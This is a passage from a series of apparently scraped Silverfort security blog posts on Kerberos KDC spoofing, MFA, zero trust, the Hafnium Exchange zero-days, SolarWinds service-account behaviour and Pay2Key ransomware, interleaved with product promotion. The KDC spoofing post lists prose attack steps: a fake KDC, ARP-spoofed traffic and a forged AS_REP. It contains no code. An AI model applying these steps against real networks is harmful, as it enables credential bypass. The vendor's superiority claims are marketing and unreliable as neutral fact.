the user obtains the ticket and key required to authenticate with services in the network without re-entering the credentials. When the user first enters the credentials, the client sends an AS_REQ to the Authentication Service (AS) function of the KDC. The AS_REQ is a message signed by the Master Key, which is a function of the user’s password. The Authentication Service, which is part of the KDC, verifies the AS_REQ according to the master key, which is also available to the KDC. After validation of the AS_REQ, the KDC returns an AS_REP, which contains a logon session key and a Ticket-Granting Ticket (TGT), that is encrypted with the KDC’s key. The AS Exchange is outlined below. The TGT will be used by the TGS exchange to obtain access to specific services. 2. Ticket-Granting Service (TGS) Exchange When the user attempts to access a service in the network, the user sends a TGS_REQ to the Ticket Granting Server (TGS) function of the KDC. This message is encrypted with the logon session key, which is obtained during the AS Exchange. The TGS_REQ is verified by the TGS, which then returns a TGS_REP. The TGS_REP contains a service session key and a service ticket, which is encrypted with the master key of the server that hosts the service. The master key of the server in a Unix-based system is configured in a file called a keytab file. The master key of the server in a member server is derived from the computer account’s password. The TGS Exchange is outlined below. 3. Client/Server Exchange Now the client has everything it needs to authenticate to the service. The client sends an AP_REQ to the service, which is encrypted with the service session key. The service decrypts the service session key to validate the AP_REQ. Then the server returns an AP_REP message and the authentication is complete. The client server exchange is outlined below: Spoof-Proof Protocol When the Kerberos protocol is implemented correctly, an attacker attempting to impersonate the KDC cannot bypass the authentication. That is because even if an attacker successfully creates a valid AS_REP in response to a hijacked AS_REQ, the attacker will never be able to engineer a valid service ticket. Since the service ticket is encrypted with the server key, a key that the attacker does not have, that would be impossible. What is KDC Spoofing? In 2000, Dug Song reported a vulnerability that affects the Kerberos protocol (Song, Dug. 2000. Kerberos KDC Spoofing Vulnerability. 28 August. ). He discovered that certain implementations and configurations of Kerberos clients fail to execute the Client/Server exchange, and allow the authentication based on the success of the previous exchanges. Unfortunately, this behavior is not secure, and can be exploited by an attacker. An attacker that is able to hijack the communication between the client and the DC, can take the following steps: Create a fake KDC. Obtain a username authorized to access the service they want to attack. Create a user in the fake KDC with a password of the attacker’s choice. For example, let’s call this password ”1”. Authenticate to the service with the obtained username and the password ”1”. Hijack the communication from the client to the DC and divert it to the fake KDC. During the AS Exchange, return an AS_REP that corresponds to the password ”1”, the fake KDC key, and a fake logon session key. During the TGS Exchange, return any TGS_REP. The client will accept the authentication without performing an application exchange. KDC spoofing attacks assume the attacker is able to hijack traffic to and from at the KDC and answer on the KDC’s behalf. This can be done using a variety of techniques. For example, if the attacker is within the same physical network segment as the client, it can perform an ARP spoofing attack as outlined in Network Security Hacks (Lockhart 2007). Another possible approach is to take over a networking device such as a switch or router and control the communication from there. Acknowledgements The research and discovery of this vulnerability was a joint effort with Thierry Van Steirteghem, who worked at Exclusive Networks at the time of discovery. --- - Published: 2021-04-08 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/what-is-multi-factor-authentication-mfa/ Multi Factor Authentication (MFA) is a security technology that is used to validate that users who authenticate with credentials are indeed who they claim to be. MFA achieves this by requiring users to provide, on top of their credentials, an additional genuine evidence of their identity - something they know, something they have or something they are. The need for MFA arises from the fact that credentials alone no longer suffice as a trusted identifier of legitimate users. In recent years we’ve witnessed a sharp increase in the volume of attacks that use compromised user credentials to access target resources. According to Microsoft, MFA is 99. 9% effective in preventing such identity-based attacks. This is because even if a user’s credentials get compromised, MFA makes it incredibly difficult for attackers to pass the authentication requirements. Why is Multi Factor Authentication a Necessity? The problem is that passwords are susceptible to compromise. There are billions of compromised credentials sold at hackers’ forums and many attackers attempt to capture credentials and sell them to other threat actors that can use them to access target resources. Various industry reports state that compromised credentials are the leading cause of enterprise data breaches. The evolution in IT landscape makes secure authentication more important than ever. Before the cloud era, in order to establish an initial foothold in the network attackers had to bypass perimeter defenses and install malware on an endpoint or server. Today, the gradual transition to the cloud places volumes of sensitive business information in the public internet – and it’s only a password away from attackers’ reach. How does Multi Factor Authentication Work? MFA adds additional steps to the authentication process. The number of these steps varies per configuration and context. These are the three basic MFA categories: Something You Know The most basic sample of this category is of course a password or any variation of memorable pieces of data that is configured by/for the user. This category also includes personal background questions which presumably only you would know to answer. Generally speaking, this category is considered the least secure since both passwords and private information can be compromised or guessed by attackers. Something You Have This category is much harder to compromise and includes various physical entities only you possess – like mobile phones, physical tokens, key fobs and smart cards. The physical entity can serve as either a carrier of the verification step - for example, a mobile phone that shows a one-time-password - or as the verifier itself such as physical token. The latter is considered more secure since it entails less data exchange in the authentication process, making it harder for an attacker to intercept. Something You Are This is considered the most secure factor category and includes your physical identifiers – most commonly a fingerprint on your mobile phone or hardware token, but also voice, facial recognition and any other unique biometrics. Any combination of these three authentication-factor categories materially increases account security and reduces the likelihood of its compromise. Examples of Traditional MFA solutions In enterprise environments, MFA is often used in with a Single Sign On (SSO) solution to increase the security of the single password used by the workforce and help reduce MFA fatigue. Static vs. Risk-Based MFA Static MFA means that every time a user attempts to access a resource, it requires MFA. This can be cumbersome and disrupt operational workflows. To avoid such disruptions and align MFA with business needs, many organizations choose one or both of the following: Apply static MFA only to sensitive users when accessing sensitive resources. This can still be very cumbersome and disruptive for administrators who work with many sensitive resources on a daily basis. Apply a risk-based approach in which MFA is required only when the risk level is high. This is called Adaptive Authentication, or Risk-Based Authentication (RBA), and entails the use of a risk engine that evaluates various factors and requires the additional verification factors only when the risk level indicates that the provided credentials might be compromised. There are various limitations with traditional MFA solutions, but this opens a longer discussion. We will write a dedicated blog about these limitations in the next few weeks. Silverfort’s Agentless MFA Solution: Complete Coverage for all Enterprise On-Prem and Multi-Cloud Resources Silverfort provides a new, innovative technology that can enforce MFA on any asset, including those that were not covered until today, across on-prem and multi-cloud environments - without requiring any agents or proxies. Silverfort MFA achieves this by fundamentally altering the traditional MFA architecture. Instead of relying on agents on the devices, Silverfort communicates directly with the IAM (Identity and Access Management) solution itself, monitors the authentication protocols and enforces MFA on top of them. Whenever a user is attempting to access a resource, the user authenticates to an IAM solution – Active Directory, Okta, Ping, Entra ID (formerly Azure AD), etc. After authenticating to the IAM solution, the access request is routed to Silverfort. Silverfort analyzes the context of each user (or service account) access request, leveraging Silverfort’s AI-driven risk engine. It then applies the appropriate access policy. For example, if the risk level is high, Silverfort can step up the authentication requirements and require the user to authentication with MFA (the authenticator can be Silverfort’s mobile MFA app or a 3rd party MFA solution). If the MFA challenge is correctly fulfilled, Silverfort instructs the IAM to grant the user access to the resource. If the MFA challenge isn’t addressed or if the access policy requires it – Silverfort can block access altogether. You can see the full flow in this diagram: MFA Everywhere Silverfort’s innovative architecture enables it to extend MFA to practically any resource that authenticates to the IAM solution in your environment as well as to any access interface. As long the resource you wish to access authenticates to IAM it will be subject to Silverfort MFA: This makes Silverfort the only MFA solution that can deliver real time prevention of the various common attack scenarios such as automated ransomware propagation and on-prem lateral movement. Learn more about Silverfort MFA here. --- - Published: 2021-04-04 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/why-ending-wfh-might-make-security-worse/ As COVID-19 vaccine rollouts pick up steam, it’s time to start thinking about the day after, and how a possible mass return of employees to their offices might affect corporate network security. At first glance, it would seem that the end of ‘Work From Home’ would strengthen the security posture of most organizations. After all, employees would be returning to the safety and comfort of the corporate network perimeter. But is working within the perimeter really more secure? Has it ever been? Unfortunately, we are finding that hackers consistently find ways to bypass perimeter security controls and breach the network. The recent SolarWinds supply chain attack demonstrated that threat actors were able to compromise more than 10,000 networks, without ever having to breach a firewall. Be it supply-chain attacks, zero-days in Internet-connected devices, or plain old brute-force attacks, there are many ways to gain access to the network and penetrate the perimeter. Furthermore, the return of WFH devices to corporate offices can introduce a significant risk, since they have been exposed to multiple threat vectors. Such devices may have been used by family members for unsafe activities, or used over unprotected networks. Since in many organizations internal network traffic is not inspected, some of these devices may well have been exposed to malware. Such malware may be waiting for the device to connect to a high-value corporate network and exploit stolen credentials to move laterally across the network and access sensitive infrastructure and data. Why Enforcing Zero Trust Only on Cloud Apps Falls Short Many security-conscious organizations have adopted a Zero Trust approach to protect their cloud applications from unauthorized access. With this approach, any device, including a device used for working from home, is considered untrusted, and requires verification before allowing it to access sensitive corporate resources. But all too often, a Zero Trust approach is only enforced on cloud applications. This leaves on-premise systems, administrative interfaces, infrastructure, IoT devices and endpoints exposed to access from compromised devices within the network. Limited Adoption of Zero Trust Security While organizations understand the value of a Zero Trust security model and agree that it’s a necessary part of their cybersecurity strategy, we still don’t see widespread adoption. Implementing micro-segmentation with proxies, or adding protections that require software agents, is a very difficult task in today’s diverse networks. Many organizations resort to implementing the model on a small subset of the organization’s applications, rather than adopting a full network-wide Zero Trust security model. Best Practices for a Safe Return to the Office Here are several security best practices to consider as employees start heading back to their workplaces: Monitor access from all devices, especially those used for WFH and over unsecured environments Use identity-based segmentation policies to prevent unauthorized usage of administrative interfaces of sensitive systems Enforce risk-based authentication for all access requests to both on-premises and cloud resources Implement and enforce network-wide identity-based Zero Trust policies With the right architecture and tools, it’s possible to implement Zero Trust policies across both on-premise and cloud infrastructures. Focusing on identity as a control plane is a good place to start. With hybrid WFH and in-the-office policies likely to remain in force for the foreseeable future, “never trust, always verify” has never been more important. To learn how Silverfort can help you reach these goals, feel free to reach out. The above is excerpted from the RSA Conference library. To read the full article, click here. --- - Published: 2021-03-11 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/hafnium-microsoft-exchange-zero-days-admin-access-critical-attack-surface/ Microsoft has recently disclosed that four zero-day vulnerabilities in Microsoft Exchange Server are actively being exploited in the wild by the Hafnium attack group. Three of these vulnerabilities are operable either in conjunction with an authentication bypass vulnerability or by gaining admin permissions with compromised credentials. This highlights once again that admin access is a critical attack surface that should be closely guarded. Microsoft released a security update in which these vulnerabilities are fixed. This is by far the most effective protection method and we urge you to install it ASAP. In addition, various security vendors released IOC for their customers to detect if these vulnerabilities are exploited in their environments. However, this is by no means the last zero-day event, or the last attack targeting admin interfaces. And while both the security update and the released IOCs mitigate the Hafnium threat, there is definitely a need for a proactive protection method that eliminates this attack surface altogether. Silverfort’s Unified Identity Protection provides such a method, enabling identity and security teams to dramatically reduce attackers’ ability to utilize compromised admin credentials to access, modify or run code on critical servers. What is the Actual Risk from Hafnium Zero Days? Exchange servers typically contain sensitive enterprise data and are thus considered a high-value target for attackers. After gaining an initial foothold in the target network, attackers look to obtain privileged access – typically by compromising admin credentials. The unfortunate reality is that despite the multiple security solutions in place, attackers typically succeed in this task. In this attack Hafnium exploits two types of zero-day vulnerabilities: >The Authentication Bypass vulnerability CVE-2021-26855 allows the attacker to authenticate as the exchange server and gain malicious access. Code execution and file writing vulnerabilities (CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) enable attackers to execute code and write files to any path on the server. In order to use them the attacker must either exploit CVE-2021-26855 first, or log in with admin credentials. In this part of the kill chain, the attackers perform what seems to be a legitimate login with legitimate credentials and is therefore a blind spot that neither IAM solutions, nor other security solutions, can efficiently identify as a problem. Time Protection for Admin Credentials with Silverfort MFA has been proven to be a powerful control against the malicious use of compromised credentials. By requiring uses to confirm their identity with a second factor, you can prevent attackers from gaining unauthorized access. The problem is that until today, MFA solutions could not be implemented on access interfaces to on-prem servers – including Microsoft’s Exchange Server, regardless if the access is done locally or remote, using RDP or a command line remote access tool. Fortunately, Silverfort now allows you to enforce this type of protection for administrative access in real time by implementing MFA for Exchange on Premise. MFA for Administrative Access The policy requires you to enter: The Users: a list of all the accounts with administrative privileges on the Exchange Server The Source: every machine that is not part of the Exchange admins machines’ group Desired Action: we recommend that MFA be enforced for any access attempt from these source machines to the Exchange Server Screen shot 1: Sample Silverfort PolicySince attackers are connecting from remote machines that administrators don’t regularly use; any access attempt from these machines would trigger an MFA request to the admin whose credentials were used by the attackers. The admin will deny (or ignore) the request, thus preventing the attackers from logging in. Monitoring and Blocking Access of Service Accounts In many deployments, various service accounts are created for Exchange Servers. These machine-to-machine accounts introduce the same risk associated with human admin accounts, but they cannot be protected by MFA since there is no real person behind them. Since the behavior of service accounts is highly predictable, Silverfort can automatically identify them and compare their behavior against a baseline to detect any deviation that may indicate a possible compromise. Silverfort then provides policy suggestions that can be easily enabled at any time to block suspicious access, send alerts to your SIEM, write to the log or any combination of the three. Visibility for Post Breach Analysis Silverfort generates and provides a full audit trail of admin account activities and the risk level of each access attempt. This visibility is highly useful if you choose not to enforce MFA. While this would not block the malicious access attempt in real time, it would provide actionable insights about any suspicious logins as well as assist in conducting an efficient forensic analysis of prior malicious activity. Conclusion Administrative access is one of the most critical attack surfaces in your network and should be protected accordingly. Enforcing MFA on all admin access to sensitive machines in your environment proactively prevents attackers from accessing them for malicious purposes – including the exploitation of CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 Hafnium zero-day vulnerabilities. Silverfort allows you to enforce MFA on any device without installing software agents on each Exchange server and without deploying proxies in your network. To learn more, schedule a call with one of our experts. --- - Published: 2021-03-02 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/consolidating-your-hybrid-iam-on-microsoft-azure-ad/ Modern enterprise IT environments are highly diverse and include many different assets, from legacy IT infrastructure to modern cloud workloads. This drives the need for multiple IAM products, each covering a different environment – on-prem, cloud, secure remote access and others. These IAM solutions work in different silos, and provide different protection capabilities for different assets, creating both a management and security problem. In terms of Identity Protection, the problem is more severe. Cloud-native and modern web apps can be protected by Entra ID (formerly Azure AD) Conditional Access, Risk Based Authentication and MFA that effectively prevent 99% of identity-based attacks. However, on-prem enterprise resources - IT infrastructure, homegrown apps, command line access tools, databases, file shares etc. – aren’t natively supported by both the SSO and the Identity Protection measures of Entra ID (formerly Azure AD). This creates a critical security gap that has not been addressed – until today. For the first time, Silverfort customers can simplify and optimize their Identity Protection by consolidating it in Entra ID (formerly Azure AD) for all their on-prem and multi-cloud resources. Entra ID (formerly Azure AD) Conditional Access, Risk Based Authentication and Microsoft Authenticator MFA solutions for Active Directory are now fully applicable to core enterprise resources that they never supported before, including IT infrastructure, legacy homegrown apps, command line access tools and many others. By this, Silverfort enables enterprises to apply best-of-breed Identity Protection across all resources and access attempts. The Three-Step Journey Towards Entra ID (formerly Azure AD) Hybrid IAM Consolidation Silverfort seamlessly enables enterprises to bridge their managed apps and resources into Entra ID (formerly Azure AD) as if they were SAML-based applications. Once bridged, these resources appear in Entra ID (formerly Azure AD) Console similar to any app that natively supports Azure AD management and can be subject to Azure AD access policies. The path to full identity protection consolidation in Entra ID (formerly Azure AD) includes three steps: Step #1: Discovery of All Applications and Resources The initial stage is to discover all the resources and applications in the on-prem and multi-cloud environment. Automating this process is a huge time saver for large enterprises that would need to identify hundreds, if not thousands of applications in their on-prem and cloud environments. Silverfort automatically discovers of all these resources and applications, identifying those that natively support Entra ID (formerly Azure AD) SSO and those that don’t. Step #2: Migration of Supported Apps into Entra ID (formerly Azure AD) To accelerate and optimize the migration process for SAML-based apps that are natively supported by Entra ID (formerly Azure AD), Silverfort provides actionable operational insights about application usage and dependencies. These insights help organizations prioritize the migration process based on business and operational needs. Step #3: Bridging unsupported apps into Entra ID (formerly Azure AD) For resources and applications that are not natively supported by Entra ID (formerly Azure AD), Silverfort enables organizations to connect them to Entra ID (formerly Azure AD). The bridged apps appear in the Entra ID (formerly Azure AD) console with a Silverfort icon. Now it is possible to apply authentication and access policies on these applications from the Entra ID (formerly Azure AD) console. What is the User Experience Post Hybrid IAM Consolidation? After completing the bridging process and the configuration of authentication and access polices, any resource access attempt is monitored and protected. For example, you can now enforce an MFA policy on Remote Powershell. First you will configure a policy that requires MFA when accessing a remote Domain Controller with Powershell: From the user’s perspective, the user will access just as before, by entering a Powershell command, DC name and user credentials: However, with the Entra ID (formerly Azure AD) policy enforced, instead of immediately getting access to the DC, the user is prompted with a Microsoft login pop-up: And again, based on the policy, the user receives an MFA notification to his or her cell phone. Only after sign-in approval can the user access the Domain Controller. Want to see more? Watch this short demo recording to see how this would look like: Final words Today, access and authentication to resources that cannot be managed in Entra ID (formerly Azure AD) need to be managed by other IAM solutions – Active Directory, ZTNA solution, VPN, local database etc. This creates both management and security challenges. Silverfort’s agentless and proxyless technology seamlessly enables enterprises to bridge their managed apps and resources into Entra ID (formerly Azure AD) as if they were SAML-based applications. By consolidating all resources and applications into the Entra ID (formerly Azure AD) Console, authentication and access to any asset can be managed as if it were natively supported by Entra ID (formerly Azure AD) and subject to Entra ID (formerly Azure AD) access policies – as simple as that. Hybrid IAM Consolidation is about simplifying and optimizing your Identity Protection by consolidating it into a single interface. It is a key component in enhancing the security posture of your enterprise and gaining resilience against attacks that utilize compromised credentials to access your on-prem and cloud resources. --- - Published: 2021-01-28 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/its-time-for-unified-identity-protection/ *****By Hed Kovetz, CEO and Co-Founder, Silverfort***** Identity-based attacks, which use compromised credentials to access enterprise resources, continue to grow in volume, sophistication, and scale. The high success rates of these attacks, in the form of either account takeover, malicious remote access, or lateral movement, reveal an inherent weakness that continues to exist in today’s Identity Protection solutions and practices. In this post I’ll review the reasons for this and introduce a new concept: Unified Identity Protection. A purpose-built Unified Identity Protection platform can close these existing identity protection gaps and enable enterprises to regain the upper hand against identity attacks. What are Identity-Based Attacks? Any attack that utilizes compromised credentials to access enterprise resources, in the cloud or on-prem, is an identity-based attack. According to the ‘2020 Verizon Data Breach Investigations Report’, stolen or compromised credentials were involved in over 80% of all data breaches and 77% of cloud breaches. However, identity-based attacks aren’t used only to gain initial access into the network. They are also used for advancing within the network itself. The modern enterprise hybrid network introduces numerous identity attack vectors which attackers target in two main stages: The Initial Access: Malicious access to SaaS apps and IaaS in the public cloud as well as penetrating the enterprise perimeter via compromised VPN or RDP remote connections. Lateral Movement: Following up on an initial breach to advance from one asset to another using compromised credentials to advance the attack. Lateral movement of this kind appears in both Advanced Persistent Threats (APT) as well as in automated malware or ransomware propagation. Enterprises need to prevent the use of compromised credentials - not only to breach the perimeter, but also to prevent attempts to use them for lateral movement. Unified Identity Protection, which extends beyond the perimeter to secure the use of credentials within the network itself, can achieve that. The Identity Protection Gaps in Today’s Enterprise Enterprises today fall short in both detecting whether a user authentication introduces risk, and preventing malicious authentication attempts. The detection gap stems from the fact that today enterprises use multiple Identity and Access Management (IAM) solutions across the hybrid network. A typical enterprise implements at least an on-premises directory, like Active Directory, a Cloud IdP for modern web applications, a VPN for remote network access, and PAM for privileged access management. There is no single solution that monitors and analyzes all of the user’s authentication activity across all resources and environments. This materially reduces the ability to understand the full context of each access attempt and identify anomalies that may indicate a risky behavior or malicious usage of compromised credentials. The prevention gap results from the fact that essential IAM security controls - such as Multi-Factor Authentication (MFA), Risk-Based Authentication (RBA) and Conditional Access enforcement- do not provide coverage for all enterprise resources, leaving critical security gaps. As a result, many assets and resource remain unprotected, including proprietary and homegrown apps, IT infrastructure, databases, file shares, command-line tools, industrial systems, and many other sensitive assets that can become a prime target for attackers. These assets continue to rely on password-based mechanisms and legacy protocols that cannot be protected by today’s agent-based or proxy-based solutions. This is because most IAM security solutions are unable to integrate with them, or do not support their protocols. When we look at all the different assets in the hybrid enterprise network, and all the possible ways to access each of them, it’s clear that it’s not enough to protect only a few of them. Any unprotected systems leaves an open gap that can enable a data breach. Yet protecting all enterprise systems one-by-one, by implementing software agents, proxies and SDKs is no longer realistic. This means that currently IAM security solutions do not offer an effective way to prevent the use of compromised credentials for malicious access and lateral movement. How Can Unified Identity Protection Address These Gaps? Unified Identity Protection consolidates IAM security controls to confront the numerous Identity Attack vectors, and extends them to all enterprise users, assets and environments. To address identity-based threat vectors and overcome the detection and prevention gaps described in the previous section, Unified Identity Protection should be founded on the following pillars: Continuous Unified Monitoring of All Access Requests: To gain full visibility, and enable accurate risk analysis, there is a need for ongoing, holistic monitoring of all access requests across all authentication protocols, of both user-to-machine and machine-to-machine access, and across all resources and environments. This includes every access attempt, whether to an endpoint, cloud workload, SaaS application, on-prem file server, legacy business application or any other resource. All the monitoring data should be aggregated into a unified repository to enable further analysis. Such a repository can help enterprises overcome the inherent problem of IAM silos and enable threat detection and analysis. Real-Time Risk Analysis for Each and Every Access Attempt: To effectively detect and respond to threats, there is a need to analyze each access request to understand its context – in real-time. This requires an ability to analyze the overall behavior of its user, i. e. , all the authentications the user performs across any network, cloud or on-prem resource, not only at the initial network login but also any further logins within these environments. This context enables a high-precision, real-time risk analysis that provides the context needed to determine if the provided credentials might be compromised. Enforcement of Adaptive Authentication and Access Policies on All Access Attempts To enforce real-time protection, there is a need to extend security controls like MFA, Risk Based Authentication and Conditional Access to all enterprise resources across all environments. Yet as we explained before, it is not practical to implement protections systems by system. This is both because of the dynamic nature of modern environments, which will turn it into a never-ending task, and the reality that many assets are simply not covered by existing IAM security solutions. To make all this achievable for enterprises, it is preferable to apply these controls without having to directly integrate with each of the different devices, servers and applications, and without requiring massive architecture changes. There needs to be a way to seamlessly enforce protections in a holistic, unified way. Unified Identity Protection Integration with Existing IAM Solutions It’s important to clarify that Unified Identity Protection doesn’t replace existing IAM solutions. Instead, it consolidates their security capabilities and extends their coverage to all assets, including ones that they don’t natively support, to ensure organizations can manage and protect all enterprise resources across all environments with unified policies and visibility. About Silverfort’s Unified Identity Protection Platform Silverfort now offers the first Unified Identity Protection Platform that closes both the detection and prevention gaps, and prevents the wide range of identity attacks that target modern enterprises. Using a unique agentless and proxyless architecture, Silverfort monitors all access request of both users and service accounts, across all asset and environments, extending high-precision Risk-Based Analysis, Conditional Access, and Multi-Factor Authentication policies to cover all resources in the hybrid enterprise environment. Due to its agentless, proxyless architecture, Silverfort can also extend these protections to assets that couldn’t be protected before, to ensure no systems remain unprotected. This short video explains the key use cases Silverfort’s Unified Identity Protection Platform addresses: Want to learn more or see a demo? Schedule a meeting with one of our experts here. --- - Published: 2021-01-24 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/service-accounts-key-role-in-sunburst-attack/ ***** By Gal Sadeh, Lead Data Scientist, Silverfort ***** Research we have conducted at Silverfort Labs indicates that service accounts likely played a key role in the ability of the SolarWinds attackers ability to move laterally within the victim’s environment. This should serve as a wakeup call for enterprise security stakeholders. Service accounts are a vulnerable and sensitive attack surface that must be protected, in order to harden an organization’s overall security posture. The Silverfort Unified Identity Protection platform protects service accounts as part of its holistic protection of all accounts in the hybrid network. This article includes both a technical analysis of SolarWinds service account behavioral patterns, as well as a demonstration of how Silverfort access policies could have protected against an attack scenario that uses these accounts for lateral movement and access to enterprise resources. Modeling the SolarWinds Service Accounts Behavior In order to protect against lateral movement based on service account credential theft, it is important to first understand the normal behavior of service accounts. This allows us to distinguish between the expected behavioral patterns and patterns that characterize attackers. For example, the SolarWinds service account normally does not use the remote desktop protocol (RDP) to authenticate to other machines. Any use of that protocol by that service account would be a red flag. For this purpose, we analyzed authentication data as well as findings from controlled attack simulations and studied three types of service accounts SolarWinds uses to scan networks and access additional machines. In the attack scenarios we examined, these accounts can be used as the primary method for lateral movement. Given the relative ease of using them for this purpose, it is likely they were exploited to carry out the SunBurst attacks as well. Let’s start by understanding the standard behavior for service account. The graphs in this section show a SolarWinds server as the middle node with edges connecting it to various machines in the network. Note - The actual names of the accounts are configured by the users in each specific environment. We’ve thus given each type a descriptive name based on its authentication behavior. Service Account Type 1: RPCSS scanner Activity: Scans the network with RPCSS service to remotely control other machines in the network. RPCSS allows the user to do almost anything on the remote machine including the ability to execute code Authentication protocol: Kerberos Service Principal Names (SPNs):Cifs, DNS, RPCSS, HOST, KRBTGT and LDAP. Predictability: High Behavior sample: Diagram 1: RPCSS Scanner service account activity pattern Service Account Type 2: General Scanner Activity: Scans the network with various protocols and when possible uses RPCSS to get access to elevated permissions on a remote machine. Occasionally, this type of service account uses NTLM. Authentication protocols: NTLM, Kerberos SPNs: RPCSS, HOST, KRBTGT and LDAP Predictability: Medium. While part of the activity is repetitive in terms of time and accessed machines, there are many activities that cannot be mapped to a deterministic pattern. Behavior sample: Diagram 2:General Scanner service account activity pattern Service Account Type #3: LDAP Scanner Activity: Performs LDAP query every 12 hours to track changes in the AD. Authentication protocol: LDAP Predictability: High Behavior sample: Diagram 3:LDAP Scanner service account activity pattern More detailed activity breakdown of this service account is presented here: Diagram 4: LDAP Scanner service account detailed activity breakdown Silverfort Protection against SunBurst Service Accounts Compromise Silverfort's Unified Identity Protection Platform uses dedicated access policies to prevent the use of compromised SolarWinds service accounts for lateral movement. The guideline in creating the policies was to capture the standard behavior of the accounts, and block and alert any detected deviation. Such deviations, as slight as they may be, are required from the attacker’s side, and blocking prohibiting them would enable the organization to react to the threat in time and thwart the attack. Service Account Type #1: RPCSS scanner This service account’s standard behavior is to authenticate only with Kerberos. A Silverfort access policy that prevents this account from performing NTLM authentication would prevent it from being abused for lateral movement. You also should make sure the scanner authenticates only with the permitted Kerberos SPNs to the known set of servers. In the policy below these are represented in the server names in the Destination field. Note that while NTLM is blocked altogether, the Kerberos part of the policy is more granular and applies only to the SPN that are not part of the account normal access list (see diagram 7) Diagram 5:Silverfort ‘RPCSS Scanner’ protection policy Service Account Type #2: General Scanner This type of service account features unpredictable behavior, posing a greater protection challenge. However, what is predictable is the machine this account normally accesses. A policy that limits this account’s access to only these machines would eliminate the risk of it being used to access other sensitive resources: Diagram 6:Silverfort ‘General Scanner’ protection policy For both of the policies above, choose only the relevant SPN each scanner uses, for example: Diagram 7: Silverfort granular Kerberos services protection for RPCSS and General Access policies Service Account Type #3: LDAP Scanner Service accounts of this type have a highly predictable behavior – performing LDAP queries every 12 hours to a distinct set of machines. A policy that limits the target resource of these accounts to this set of machines, and allows these accounts to authenticate with LDAP only, would eliminate the risk of lateral movement that they introduce. Diagram 8: Silverfort ‘LDAP Scanner’ protection policy Final Thoughts In today’s threat landscape, protection against the use of compromised credentials to access sensitive resources is often a missing link in the security stack of most enterprises. The SunBurst attack demonstrates once again that this lack of protection creates a critical risk exposure. Silverfort Unified Identity Protection platform is purpose-built to confront and win against the rising threat that identity attacks introduce to your enterprise. Learn more about Silverfort Service Account Protection here. --- - Published: 2021-01-07 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/why-identity-protection-is-needed-more-than-ever/ The Pay2Key attacks have targeted leading enterprises in the past couple of months with various ransomware, extortion and data theft attacks. These attacks did not feature any noticeable innovation on the offensive side. However, they do offer insight into the fact that threat actors are increasingly targeting modern enterprises with compromised credentials - not only for the Initial Access stage, but also for lateral movement. The important role that compromised credentials play in today’s attacks poses a critical challenge to security teams. This article analyzes two sample Pay2Key attacks, presents three actionable insights for enterprise security decision makers, and explains how Silverfort’s Unified Identity Protection platform can address this new reality, in which user identities have become a primary attack surface. Pay2Key Attack - Example #1: RDP and Automated Ransomware Propagation This attack was disclosed on November 8th 2020, by Check Point . The attackers attempted to execute a mass ransomware campaign. To achieve that, they altered the traditional weaponized email vector, often used for gaining initial access, to a more efficient technique – remote connection utilizing compromised RDP credentials. Once establishing a connection with a machine within the targeted environment, they configured this machine as a pivotproxy to deliver the ransomware payload to other machines in the network. The actual propagation was done by using the PSexec automation capability that enabled the ransomware to spread across the entire network within a single hour. Initial Access via compromised RDP credentials Persistence via configuration of compromised machine as C2C server Lateral Movement via Psexec Diagram 1: Pay2Key Attack Example #1 Pay2Key Attack Example #2: Supply Chain RDP and Manual Lateral Movement A different attack took place in the beginning of December 2020, and featured similar tactic for gaining Initial Access: like in the previous example, compromised RDP credentials were used to access a server of a 3rd party contractor that could connect to the target environment. From there, the attack followed a standard Lateral Movement process, with the attackers compromising additional credentials as they advanced, and using them to log in to other production servers with Powershell. Eventually, the attackers managed to exfiltrate significant volumes of sensitive data and used it to extort their victim while threatening to leaking the data to the public. Initial Access via supply chain server with compromised RDP credentials Lateral Movement via Powershell scripts Persistence and Data Exfiltration via backdoor on each compromised server Diagram 2: Pay2Key Attack Example #2 Security Insight 1 – Compromised Credentials are now Extensively Used for the Initial Access Stage By default, the immediate association of the ‘Initial Access’ stage of the attack, is the use of malware and exploits. While in many cases this is still true, it’s important to note that Compromised Credentials are taking an increasingly bigger role in this process. Verizon’s 2020 DBIR states that using compromised credentials has topped exploits and backdoor malware as the hackers’ preferred infection vector: ‘... Malware has been on a consistent and steady decline as a percentage of breaches over the last five years. Why is this? Has malware just gone out of fashion like poofy hair and common courtesy? No, we think that other attack types such as hacking and social breaches benefit from the theft of credentials... ’ Security Insight 2 – Lateral Movement is a Compromised Credentials Problem Malware authors put in hard work in their strive to make their attack vector appear as legitimate behavior to avoid detection. Unfortunately for the defending side, that isn’t needed for the Lateral Movement stage. Once an attacker has successfully compromised user account credentials, the malicious login looks 100% legitimate, giving them direct access to additional machines. In terms of a ransomware protection strategy, it means that the key to protect against Lateral Movement should be found in the field of secure authentication - i. e. , MFA and Conditional Access policies – tools that have been proven effective against the use of compromised credentials. However, these tools are not the common practice of enterprises’ security teams today. Security Insight 3 – Compromised Credentials Are The New Identity Attack Surface The new enterprise IT environment features hybrid on-prem and cloud networks, and needs to support massive remote access to enterprise resources (a growing need driven by Covid19). User account identities play a key role in accessing resources in this environment. This hasn’t gone unnoticed by attackers who are relentlessly pursuing your user account credentials - regardless if these are credentials for an on-prem file server or a- SaaS application of remote access VPN. It is time to acknowledge that Identities are becoming a critical attack surface and that Identity Protection is needed more than ever. Silverfort Unified Identity Protection Platform Silverfort is the first Unified Identity Protection that consolidates security controls across corporate networks and cloud environments to block identity-based attacks. Using an innovative agentless and proxyless technology Silverfort applies continuous monitoring, risk analysis and adaptive access policy on every authentication of every user account to any resource, on-prem or in the cloud In the context of the Pay2Key attacks, they targeted the RDP and windows admin tools such as PSexec and Powershell. If it were possible to enforce MFA on Powershell and these other access methods, the attacks would have failed completely. Well guess what? – it’s now possible. Silverfort vs Pay2Key Attacks To recap, the ‘Initial Access’ stage of this attack started with using compromised RDP credentials. Silverfort enforces MFA for RDP connections to ensure legitimate access, so, because the attackers can’t authenticate with the 2nd factor, it would have blocked the attack’s Initial Access stage and the attackers would have never penetrated the perimeter. Initial Access via compromised RDP credentials is blocked by Silverfor MFA policy on RDP connections Diagram 3: Pay2Key Attack Example #1 